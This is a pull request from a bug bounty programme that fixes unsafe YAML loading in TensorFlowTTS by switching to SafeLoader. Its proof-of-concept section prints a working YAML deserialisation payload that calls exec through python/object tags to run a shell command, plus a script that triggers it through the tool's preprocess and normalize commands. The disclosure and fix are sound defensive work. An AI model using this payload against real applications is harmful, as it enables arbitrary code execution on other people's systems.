### PR TITLE
Security Fix for Arbitrary Code Execution - huntr.dev

### DIFF
--- a/tensorflow_tts/bin/preprocess.py
+++ b/tensorflow_tts/bin/preprocess.py
@@ -106,7 +106,7 @@ def parse_and_config():
     logging.basicConfig(level=log_level[args.verbose], format=FORMAT)
 
     # load config
-    config = yaml.load(open(args.config), Loader=yaml.Loader)
+    config = yaml.load(open(args.config), Loader=yaml.SafeLoader)
     config.update(vars(args))
     # config checks
     assert config["format"] == "npy", "'npy' is the only supported format."

--- a/tensorflow_tts/inference/auto_config.py
+++ b/tensorflow_tts/inference/auto_config.py
@@ -51,7 +51,7 @@ class AutoConfig:
     @classmethod
     def from_pretrained(cls, pretrained_path, **kwargs):
         with open(pretrained_path) as f:
-            config = yaml.load(f, Loader=yaml.Loader)
+            config = yaml.load(f, Loader=yaml.SafeLoader)
 
         try:
             model_type = config["model_type"]


### PR DESCRIPTION
@Anon-Artist (https://huntr.dev/users/Anon-Artist) has fixed a potential Arbitrary Code Execution vulnerability in your repository 🔨. For more information, visit our website (https://huntr.dev/) or click the bounty URL below...

Q | A
Version Affected | *
Bug Fix | YES
Original Pull Request | https://github.com/418sec/TensorFlowTTS/pull/1
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/tensorflowtts/1/README.md

### User Comments:

### 📊 Metadata *
TensorFlowTTS provides real-time state-of-the-art speech synthesis architectures such as Tacotron-2, Melgan, Multiband-Melgan, FastSpeech, FastSpeech2 based-on TensorFlow 2. With Tensorflow 2, we can speed-up training/inference progress, optimizer further by using fake-quantize aware and pruning, make TTS models can be run faster than real-time and be able to deploy on mobile devices or embedded systems.

#### Bounty URL: https://www.huntr.dev/bounties/1-pip-tensorflowtts/

### ⚙️ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

### 💻 Technical Description *

Fixed by avoiding unsafe loader.

### 🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

```
# exploit.py
import os
os.system('pip install TensorFlowTTS')
exploit = '''!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
'''
os.system('rm exploit.yml exploit.yaml')
open('exploit.yml','w+').write(exploit)
print("\n\nexploiting preprocess in tts")
cmd = str('''tensorflow-tts-preprocess --rootdir ./ --outdir ./ --config exploit.yml ''')
os.system(cmd)
print("\n\nexploiting normalize in tts")
cmd1 = str('''tensorflow-tts-normalize --rootdir ./ --outdir ./ --config exploit.yml ''')
os.system(cmd1)
```

Execute the commands in another terminal:

```
python exploit.py
```
xcalc will pop up.

### 🔥 Proof of Fix (PoF) *

After fix it will not popup a calc.

### 👍 User Acceptance Testing (UAT)
After fix functionality is unaffected.

### 🔗 Relates to...
https://www.huntr.dev/bounties/1-pip-tensorflowtts/
